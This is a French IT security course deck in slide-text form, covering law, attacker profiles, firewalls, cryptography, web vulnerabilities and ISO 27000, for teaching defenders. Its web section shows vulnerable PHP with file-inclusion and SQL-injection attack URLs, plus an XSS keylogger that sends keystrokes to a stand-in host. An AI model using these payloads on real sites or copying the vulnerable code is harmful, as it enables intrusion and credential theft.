Sécurité Informatique PDF
Sécurité Informatique PDF
Sécurité Informatique PDF
Fabrice Prigent
20 mars 2015
Accès et maintien :
Pénal : Art 323-1 : 30 000 e, 2 ans de prison
si en plus altération : 45 000 e, 3 ans de prison
si en plus STAD de l’état : 75 000 e, 5 ans de prison
Entrave au système d’information :
Pénal : Art 323-2 : 75 000 e, 5 ans de prison.
si en plus STAD de l’état : 100 000 e, 7 ans de prison
Possession d’outils de piratage :
Pénal : peines identiques aux infractions ”possibles”.
Pour résumer
”Pas vu, Pas pris
Vu : Niqué !”
Protéger l’informatique ?
Intégrité ?
Confidentialité ?
Disponibilité ?
Empêcher les accès aux utilisateurs ?
Fake-mail du PDG ?
Notion d’image
Perte de marchés
Et pourtant aucun ”risque informatique”
Mais on peut réduire le risque informatiquement
Vol / Destruction d’un serveur ?
Protection physique (est-ce votre rôle ?)
Sauvegarde
Protéger l’entreprise
Y compris sa version non informatique
Par des moyens informatiques
Si vous n’en êtes pas convaincus, essayez d’en convaincre vos
interlocuteurs.
Evaluer
Les difficultés
Le contexte
Quels sont les risques ?
Quelles sont les menaces ?
La sécurité se mesure-t-elle ?
Définir les rôles : politique de sécurité
Qui fait quoi, comment et quand ?
Qui peut faire quoi, comment et quand ?
Définir un plan d’action
Quelle sont les priorités ?
Les difficultés
Le contexte
Quels sont les risques ?
Quelles sont les menaces ?
La sécurité se mesure-t-elle ?
Historique
Connexion de bout en bout
Réseau ouvert
les RFC 1122 et 1123 définissent les règles pour les machines
Accessibilité totale
On fait ce que l’on dit, et l’on dit ce que l’on fait
Signaler quand cela ne marche pas
Signaler pourquoi
Système ouvert
Finger
Rexec
Sendmail
Destruction de données
Perte de marchés
Perte de temps et donc d’argent
Risques juridiques
Comptabilité
Données clients
R & D, Conception, Production
Les PME meurent dans les 3 mois.
Arrêt de la production
Recherche des causes
Remise en état
Lois françaises
Echanges illégaux (terrorisme/pédopornographie/p2p),
Attaques par rebond,
Confidentialité des données personnelles,
Les banques portent désormais plainte contre les sites de
phishing.
Article 226-17 et Article 226-34 (CNIL).
Contrats
Disponibilité
Lois internationales
Loi Sarbanes-Oxley (US)
Réglementation Bâle II
Historique
Niveau des attaques
Types d’attaque
Déroulement d’une attaque
DDOS NTP
Généralisation des cryptolockers
25 Septembre : ShellShock (1998) http://fr.wikipedia.
org/wiki/Shellshock_(faille_informatique)
Piratage de Sony
Piratage/Rançon Domino Pizza
Groupe FIN4 (espionnage Bourse)
Failles SSL
Mars : Heartbleed (Mars 2012)
http://fr.wikipedia.org/wiki/Heartbleed
Faille SSLv3(Poodle)
SSL Mac
GnuTLS
Attaques étatiques
Sandsworm (Russie)
Chine MitM iCloud
Malware Regin(début 2006) spécialisé sur GSM
AuroraGold (NSA GSM/Chiffrement)
Poivre du Sichuan
Cyberdjihadisme de masse
3 failles 0day en 1 semaine sur flash player
600
500
400
300
200
100
http://map.honeynet.org
http:
//cybermap.kaspersky.com
http:
//zone-h.org
Fabrice Prigent Sécurité Informatique/ 20 mars 2015 33 / 351
Niveau des attaques
Niveau
Fast Flux
Utilisation de SNMP
Backdoor
Script Kiddies
90% playstation 9% clickomane 1% intelligence
utilise ce que font les autres
Amateur
Failles connues
Failles web
Professionnel
En équipe
Avec beaucoup de moyens (financiers et techniques)
0days possibles.
Scammer
piratage volumétrique
cryptolocker ”killer application”
Hacktiviste
”Terroriste”
Anonymous
Espions
Etatique
Industriel
”Petit con”
Ne pas se méprendre
La moyenne des pirates est plus bête qu’avant.
Mais les meilleurs pirates sont bien meilleurs qu’avant
plus psychologues (Social Engineering, virus)
plus pragmatiques (Efficacité, Argent)
plus techniques (Ingénieurs au chomage après éclatement de la
bulle internet)
Mais
actuellement les machines résolvent 99% des captchas.
Saturation de la CPU
10 zombies mais les machines sont ”grillées”, connaissances
pointues
Lutte : limitation de la CPU (noyau), mod evasive (http)
Plantage distant
1 zombie. Expertise nécessaire
Patch régulier, durcissement noyau, protection applicative
source
https: // pasillo. renater.
Fabrice Prigent
fr/ weathermap/ weathermap_
Sécurité Informatique/ 20 mars 2015 48 / 351
La protection DDOS
Elle se prépare
Savoir ce que l’on est prêt à sacrifier (ou pas)
En terme de correspondants
En terme de services
Connaitre les interlocuteurs
Avoir mis en place les procédures
Elle est multi-niveaux
Volumétrique (FAI)
Connexion (Réseau)
Applicative (Développement)
Collecte d’informations
Repérage des vulnérabilités
Utilisation des vulnérabilités => intrusion
Accession aux droits administrateur (escalade)
Camouflage
Installation d’une backdoor
200
100
0
jeu. sam. lun. mer. ven. dim. mar. jeu. sam. lun. mer. ven. dim. mar.
500
400
300
200
100
0
mar. jeu. sam. lun. mer. ven. dim. mar. jeu. sam. lun. mer. ven. dim. mar.
Quarantaine en sortie par heure Quarantaine en entree par heure
http://www.shodanhq.com
Politique de sécurité
Le web est autorisé pour qui, pour quoi ?
Qui peut utiliser la messagerie ?
Qui définit les règles ?
Qui les annonce et comment ?
Quelles sont les sanctions ?
Tenter l’impossible
Faire du tout sécuritaire
Efficacité
100%
Coût :
●Financier,
0% ●Compétence,
●Désagréments
Rappel
Votre but est que ”votre organisme fonctionne” pas de concurrencer
Fort Knox
Optionnel
En cas de recours en justice
A notre initiative
Mais aussi à notre encontre
Tâche ingrate et rarement effectuée
Réputation
Argent
Temps
L’attaque a réussi
Pourquoi ?
Comment y remédier ?
Parer à la faille utilisée
Réfléchir à une généralisation de cette faille
La tronçonneuse
Le ciseau à bois
Le papier de verre
La lazure
On enlève l’inutile :
Protection contre l’extérieur ;
Protection contre l’intérieur ;
Protection à l’intérieur.
Les journaux sont nos seuls amis. On va donc faire appel à eux
pour
Les machines internes qui déclenchent des alertes.
Les services qui sont auscultés par l’extérieur
Les alertes récurrentes
De nombreux noms
Firewall
Garde-Barrières
Gatekeeper
Qu’est-ce que c’est ?
Comment ça marche ?
Evaluer et choisir un pare-feu
Définition réseaux
Types de pare-feux
Types d’architecture
Critères de choix
Perspectives
La sortie
Qui ?
Pour quoi ?
L’entrée
Qui ?
Pour quoi ?
IP
ICMP
La notion de port
TCP
UDP
Protocoles
Protocole de communication
Actuellement en version IPv4
IPv6 en cours de déploiement (Free depuis Décembre 2007)
Chaque machine sur Internet a une adresse IP unique
Les paquets se propagent de routeur en routeur
Protocole non fiable mais résistant
Adresse IP source
Adresse IP destination
Données
Protocole de signalisation
Service/machine/réseau injoignable
Demande de ralentissement
Peut être utilisé pour les attaques
ICMP Redirect
ICMP Echo
Attaque smurf
Dénomination
Port destination : port du destinataire
Port source : port de l’expéditeur (provenance du paquet)
Client Serveur
65535 65535
… …
49152 49152
49151 49151
… …
1024 1024
1023 1023
… …
1 1
Protocole connecté
Assure la cohérence de la connexion
A un début et une fin
Un ”triple handshake” initialise la connexion
L’aléa du numéro de séquence n’est pas toujours bon
S’il est prévisible, on peut ”simuler” une connexion
Client Serveur
Choix du SYN (1000) Choix du
N° SEQ SYN (2000),ACK(1001) N° SEQ
ACK(2001)
Communication Etablie
Tout paquet possède un ACK
ICMP (<1%)
IP
Règle 1
Règle 2
Règle 3
Règle 4
Règle 5
Règle 6
Règle 7
Règle 8
Règle 9
Règle 10
Règle 11
Règle 12
Règle 13
Règle 14
Règle 15 Pas d ’arrêt sur correspondance
Règle 1 Règle 2
Règle 2 Règle 4
Règle 3 Règle 6
Règle 4 Règle 7
Règle 5 Règle 5
Règle 6 Règle 3
Règle 7 Règle 1
192.168.0.0/16 ==> 10.0.0.0 PAS OK 192.168.1.0/24 ==> 10.0.0.0 OK
192.168.1.0/24 ==> 10.0.0.0 OK 192.168.0.0/16 ==> 10.0.0.0 PAS OK
Règle 1
Règle 2 Règle 2.1
Règle 2.2
Règle 2.3
Règle 2.4
Règle 3
Règle 4
Règle 5 Règle 5.1
Règle 5.2 Correspondance
Règle 5.3
Règle 6
Règle 7
Règle 8 Règle 8.1
Règle 8.2
Règle 8.3
Limitation de débit
Eviter les abus internes
Limiter les rebonds de flooding
Journalisation
du refus
des paquets refusés
IOS cisco
Filtre commutateurs et routeurs
Iptables (mais peut faire mieux)
Pktfilter sur windows 2K/XP/2003
De manière générale : tout filtre accéléré par ASIC
Interface(s)
Interface(s)
FORWARD
User-defined
INPUT OUTPUT
User-defined
Processus
Filtrage en entrée
Autorisez du ssh, puis du ftp passif et du ftp actif
Filtrage en sortie
Autorisez du ssh, puis du ftp actif et du ftp passif
Serveur IP-S
Port-S Critère d ’état, Timeout
Paquet 1
IP-C:P-C / IP-S:P-S / NEW / 29
Paquet 2 IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /
Paquet 3 IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /
Communication
Communication
Paquet 1500
IP-C:P-C / IP-S:P-S / ESTABLISHED / 179
Paquet 1501
IP-C:P-C / IP-S:P-S / ESTABLISHED / 179
Rien pendant 300 sec
RIEN ==> Timeout
Paquet 1502
IP-C:P-C / IP-S:P-S / NEW / 29
Communication Etablie
PORT, IP-C,P-C2
IP-C:P-C / IP-S:P-S / ESTABLISHED / 890
200 PORT OK
IP-C:P-C2 / IP-S:20 / RELATED / 890
Externe Interne
123.45.67.89:80 10.1.1.2:3456
123.45.67.89:80 12.1.1.4:3456
123.45.67.89:80 12.1.1.4:3456
123.45.67.89:80 10.1.1.2:3456
Client C1
Serveur S1
Externe Interne
123.45.67.89:3456 12.1.1.4:80
123.45.67.89:3456 10.1.1.2:80
123.45.67.89:3456 10.1.1.2:80
123.45.67.89:3456 12.1.1.4:80
Client C1 Serveur S1
Externe Interne
123.45.67.89:80 10.1.1.2:3456
123.45.67.89:80 12.1.1.4:3456
123.45.67.89:80 12.1.1.4:3456
123.45.67.89:80 10.1.1.2:3456
Serveur S1 Client C1
11.11.11.11 :80 10.1.1.4:6789
11.11.11.11:80 12.1.1.5:6789
Serveur S1 Client C1
11.11.11.11 :80 10.1.1.4:6789
11.11.11.11:80 12.1.1.3.8002
Externe Interne
123.45.67.89:21 12.1.1.3:8001 123.45.67.89:21 10.1.1.2:3456
123.45.67.89:20 10,1,1,2,6789
10.1.1.2
!!!
Externe Interne
123.45.67.89:21 12.1.1.3:8001 123.45.67.89:21 10.1.1.2:3456
Interface(s) Interface(s)
PREROUTING FORWARD POSTROUTING
User-defined
INPUT OUTPUT
User-defined
Processus
Palo Alto
iptables + L7 Filter + NuFW (UFWi)
Maintenant tout FW est forcément NG.....
NetASQ
Tippingpoint
Snort Inline
Guardian pour iptables
Iptables et module string
Hogwash
Dsniff
Hunt, Juggernaut, Couic
Nombre de règles
Mise à jour des règles (qui, d’où)
Relais R
R-S
Règles Serveur S
C-R Accepte
Décision
Port
du
relais R-S2
Machine Redirige
cliente C
Interdit Serveur S2
Logs
La standardiste
C’est un relais générique
Généralement placé au niveau circuit (TCP ou UDP)
La communication C-R encapsule la communication C-S.
Le client demande au relais une communication à l’extérieur
Autorisation basée sur
l’origine (machine, port)
la destination (machine, port)
l’identification ou l’authentification du client pour tout
protocole
Lent
Tous les protocoles ne passent pas
Ne comprend pas la communication
Nécessite l’installation d’une partie cliente
Intégrée dans les outils
Intégrée dans le système par des librairies
Empêche la notion de serveur
Lutte antivirale
Filtrage d’action (put, get pour le ftp)
Filtrage d’URLs
Cache (optimisation du trafic)
Authentification
Complémentarité visible
Quelques pare-feu intègrent 2 processus
Filtrage stateful qui renvoie vers
des Relais applicatifs transparents
Dépend
De la sécurité exigée
De la vitesse nécessaire
Du budget disponible
Des exigences des utilisateurs
Rarement limité à un seul type
Ils sont très complémentaires.
Les relais ne sont rien sans des interdictions
Les architectures
Réseau extérieur
Pare-feu
Ressources privées
Ressources publiques
Zone dangereuse
Zone semi-protégée
Zone protégée
Les plus
Protège tout le réseau
L’accès aux serveurs publics est rapide
Les moins
Si le serveur public est compromis ....
Si le PF est compromis ....
Les plus
Si les serveurs publics compromis => PF
Les moins
Les serveurs publics sont moins accessibles
Si le PF est compromis ....
Les plus
Tout le réseau est protégé
Si serveurs publics compromis => PF2
Si PF1 compromis => PF2
Les moins
Les serveurs publics sont moins accessibles (sauf si PF2
filtrant)
Les plus
Moins cher
Plus facile à administrer
Même technologie pour toutes les DMZ
Les moins
Si PF compromis ...
Règles plus complexes
Combien de DMZ ?
1 pour les serveurs publics
1 pour les entrées
1 pour les sorties
....
NMAP
Services visibles par un pirate
Filterrules
Analyse des filtres réellement en place
NIDS après le PF
Vérifie que rien ne passe.
Configurer
Interface graphique ?
Console ?
A distance ?
Console d’administration centrale
Par telnet ou ssh
Sur la console ?
Le Chiffrement
Le crypt unix
”password” ==> ”5GKtdsqlkgy”
Le CRC (Compute Redondancy Check)
le sum unix
SHA-1 (Shamir)
MD5 (Rivest)
Blowfish
Génération :
Alice choisit son mot de passe M1
Le système ”hashe” M1 pour obtenir HASH1
Le système ne conserve que HASH1
Utilisation
Alice se reconnecte, en tapant le mot de passe M2
(normalement identique à M1)
Le système hashe M2 et obtient HASH2
Si HASH2=HASH1 alors M2=M1, donc OK
Option : on peut ajouter un ”sel” pour complexifier le craquage
des mots de passe.
Alice
Algorithme Bob
Message de
chiffrement Message chiffré
Algorithme
de Message
déchiffrement
Clé
de
Chiffrement
Exemples à transposition
Rotation 13 (code de César) => pas de clé
Code de Vigenère
XOR
Exemples à permutation
DES (64 bits) , et triple DES (3DES)
IDEA
AES (actuel standard de l ’armée US)
Ancien standard
56 bits (64 - 8 réservés à la parité)
version renforcée : le triple DES, mais à 2 clés. Efficacité de
113 bits
Bloc de permutation de 64 bits
http://www.securiteinfo.com/crypto/aes.shtml
Nouveau standard (il s’appellait Rijndael à l’origine après
unconcours de la NSA)
Auteurs Rijmen et Daemen
Plusieurs versions de 128,192 ou 256 bits
Plus rapide que DES (il ne travaille qu’avec des entiers)
Bob
Clé publique
de Bob
Génération Publication Alice
du bi-clé sur Internet
Clé privée Clé publique
de Bob de Bob
Algorithme Algorithme
de de
déchiffrement Message Message chiffrement
Message chiffré
Méthodes
R.S.A.
D.S.S./Diffie Helmann
El Gamal (logarithme discret)
Outils
PGP
GPG
Openssl
Alice
Bob Message
Algo Hash Clé publique
Message Message Hash codé
Algo Chiffrement de Bob
Hash Codé
Clé privée
Hash Hash Hash déchiffré
de Bob
Algorithme
de Comparaison
chiffrement
Hash chiffré
Clé Publique
de Verisign
Verisign
Certificateur : Verisign
Clé publique Objet : Verisign
de Verisign
Chiffrement : RSA
Hashage : MD5
Hash Codé
hashage MD5
Clé privée
Hash
de Verisign
chiffrement RSA
Hash chiffré
Verisign
Vérification
identité
Clé publique
de BNP
Clé Publique
de BNP
Certificateur : Verisign
hashage MD5 Objet : BNP
Chiffrement : RSA
Hashage : MD5
Hash Codé
Clé privée
Hash
de Verisign
chiffrement RSA
Hash chiffré
Certificate:
Data:
Version: 1 (0x0)
Serial Number: 7829 (0x1e95)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=ZA, ST=Western Cape, L=Cape Town, O=Thawte Consulting cc,
OU=Certification Services Division,
CN=Thawte Server CA/emailAddress=server-certs@thawte.com
Validity
Not Before: Jul 9 16:04:02 1998 GMT
Not After : Jul 9 16:04:02 1999 GMT
Subject: C=US, ST=Maryland, L=Pasadena, O=Brent Baccala,
OU=FreeSoft, CN=www.freesoft.org/emailAddress=baccala@freesoft.org
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:b4:31:98:0a:c4:bc:62:c1:88:aa:dc:b0:c8:bb:
...
d2:75:6b:c1:ea:9e:5c:5c:ea:7d:c1:a1:10:bc:b8:
e8:35:1c:9e:27:52:7e:41:8f
Exponent: 65537 (0x10001)
Signature Algorithm: md5WithRSAEncryption
93:5f:8f:5f:c5:af:bf:0a:ab:a5:6d:fb:24:5f:b6:59:5d:9d:
....
0d:19:aa:ad:dd:9a:df:ab:97:50:65:f5:5e:85:a6:ef:19:d1:
http://michel.arboi.free.fr/cryptFAQ
http://www.ossir.org/resist/supports/cr/200203/
crypto.pdf
http://cr.yp.to/
Exemple d’inclusion.
Soit le programme suivant
<?
include ("header.inc");
$page=$_GET[’page’];
include ($page);
include ("footer.inc");
?>
que l’on utilise de la manière suivante
Utilisation
http://192.168.30.72/mep.php?page=toto.txt
Quelques attaques :
Exemples simples d’utilisation malveillante
http://192.168.30.72/mep.php?page=/etc/passwd
http://192.168.30.72/mep.php?
page=http://cri.univ-tlse1.fr/creufophacker.inc
Utilisation
http://192.168.30.72/php/test.sql?id=3;
Code du programme
$sql_query="DELETE FROM matable WHERE id=$id";
mysql_connect($database);
mysql_query($database,$sql_query);
Code du programme
<?
$sql_query="DELETE FROM matable \
WHERE id=$id AND champ1=true";
mysql_connect($database);
mysql_query($database,$sql_query);
?>
On ajoute un commentaire
http://192.168.30.72/php/test.sql?id=3 OR 1=1 - -
Code du programme
$id=add_slashes($id);
$sql_query="DELETE FROM matable WHERE id=’$id’";
Qui ne fait plus rien. Mais ce n’est toujours pas fini. Une faille
existe malgré cela.
Et si on saisit ?
<script>
while (1)
alert("Vas téter la prise électrique");
</script>
Spécifique IE
<bgsound Javascript”>
<script language="javascript">
var keys=’’;
document. {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = ’http://hack.com/keylogger.php?c=’+keys;
keys = ’’;
}, 1000);
</script>
http://www.beefproject.com
Un constat
beaucoup d’applications sont livrées ”telles quelles”
il y a souvent un historique lourd
les applications sont ”mouvantes”.
les développeurs ne sont pas souvent formés.
http://ha.ckers.org/xss.html
http://sla.ckers.org/forum/list.php?2
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php
http://www.php-ids.org/
Ce que l’on a
FIDO et Yubikey
RSA SecurID
Ce que l’on est
lecture d’empreintes digitales (ou de carte veineuse)
lecture d’iris de l’oeil
reconnaissance du visage
vitesse de frappe sur les touches
Vérifier sa sécurité.
Pourquoi ?
Leur montrer comment réagissent leurs outils de sécurité (et
ainsi éviter les ”fake”).
Leur faire prendre conscience de la sécurité,
Les rendre autonomes,
Les rendre ”détecteurs d’incident”.
Comment ?
Déclencher une alerte avec http://eicar.com pour l’antivirus
Tester le firewall local avec grc.com
Voir le repérage des spams, phishing, etc.
Pourquoi ?
Parce que c’est une valeur importante de l’entreprise,
Parce ce que cela peut faciliter ou compliquer voire interdire la
communication avec les clients.
Comment ?
Voir la réputation mail avec
mxtoolbox pour savoir si l’on est blacklisté
backscatter pour repérer nos refus de mails fautifs
chez CISCO
Voir la réputation web avec
chez McAfee
Avons nous une zone DNS propre ?
Mais attention :
Vérifiez que vous avez le droit de tester (serveur mutualisé ou
hébergé),
Vérifiez la compétence (réputation, autres clients, etc.),
Ne pas choisir l’option ”je paye uniquement si vous trouvez”
(les 0days s’achètent ! ! !)
Définissez bien le périmètre (géographique, opérationnel,
temporel etc.),
TEST = RISQUE,
Plus vous en savez, mieux vous serez servis.
Par manque de temps, ces sujets n’ont pas été traités. Ils sont
indiqués afin que vous puissiez vous renseigner dessus.
Les VPN (IPSEC, VPN-SSL, openvpn)
La sécurisation d’une structure AD
La sécurisation des accès (filaire ou wifi)
Les portails captifs (et leurs limites avec le HTTPS)
Le 802.1x (avec le protocole EAP et surtout PEAP)
La gestion des spams
La gestion du phishing
Habituer ses utilisateurs
Limiter les dégâts (détection de l’origine des connexions)
La lutte antivirale
Les limites des antivirus
La détection et le blocage post-infection (DNS, Squidguard)
Le DNS RPZ (DNS Menteur)
Pourquoi ?
Besoin de définir des bonnes pratiques (pas de notion
d’absolu !)
Besoin de parler de la même chose
Besoin de certification (évaluation) commune
Evaluation des hommes (pour le recrutement)
Evaluation des entreprises (pour la publicité, ou les cercles de
confiance)
Appliquer à la sécurité les principes de la qualité
C’est quoi ?
Tradition anglo-saxonne
Objectif : s’améliorer, RIEN DE PLUS
Roue de deming (PDCA)
Plan : je prévois ce que je vais faire
Do : je fais ce que j’ai prévu
Check : je vérifie (mesure) que j’ai fait ce que j’ai prévu
Act : je constate ce qui n’a pas marché pour le corriger
On recommence
Concept associé aux normes ISO 9001
Ce sont des documents payants à récupérer sur le site de
l’ISO : 100 à 150 e
Pourquoi ?
ISO 27000 : Le vocabulaire
ISO 27001 : Le système de gestion de la sécurité SMSI
ISO 27002 : Les bonnes pratiques de la sécurité
ISO 27003 : Installation d’un SMSI
ISO 27004 : Indicateurs et tableaux de bord
ISO 27005 : La gestion du risque
ISO 27006 : Les audits de sécurité
ISO 27007 : Guide pour l’audit d’un SMSI
Audits et revues
Publiée en 2014
Continuité d’activité
Publiée en 2011
Basée sur un British standard (BS 25999) et le (BC/DR
SS507) singapourien
Cybersécurité (Internet)
Publiée en 2012
Sécurité Applicative
Publiée en 2011